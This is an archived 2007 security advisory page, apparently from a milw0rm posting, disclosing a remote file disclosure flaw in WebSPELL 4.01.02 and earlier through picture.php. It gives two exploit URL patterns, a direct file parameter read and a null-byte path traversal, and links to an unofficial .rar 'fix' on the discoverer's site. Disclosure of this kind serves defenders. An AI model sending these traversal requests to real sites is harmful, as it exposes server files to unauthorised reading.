Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16679
HistoryApr 12, 2007 - 12:00 a.m.

WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability

2007-04-1200:00:00
vulners.com
161
JSON

WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability

Discovered by: Trex

Visit: www.Trex-Online.net / www.UnderGround.ag

Comment: Happy easter!

___ ___

/ \ / \ ___________________________

/ / \_/ \ \ / \

\/\ /\/ / GIVE ME A CARROT OR I WILL \

\O O/ \ BLOW UP YOUR HOUSE /

/ ^ \ / ___________________________/

\__/ //

/ \

// \\

/\/\/_\

Vulnerability 1:

Advantage: works independently from PHP version.

Disadvantage: works dependently from PHP option register_globals (= on).

http://[SITE][PAHT]/picture.php?file=[FILE]

Vulnerability 2:

Advantage: works independently from PHP option register_globals.

Disadvantage: works dependently from PHP versions (< 4.3.0).

http://[SITE][PAHT]/picture.php?id=…/…/…/[FILE]%00

Solution:

http://fixes.trex-online.net/picture.rar

milw0rm.com [2007-04-05]

JSON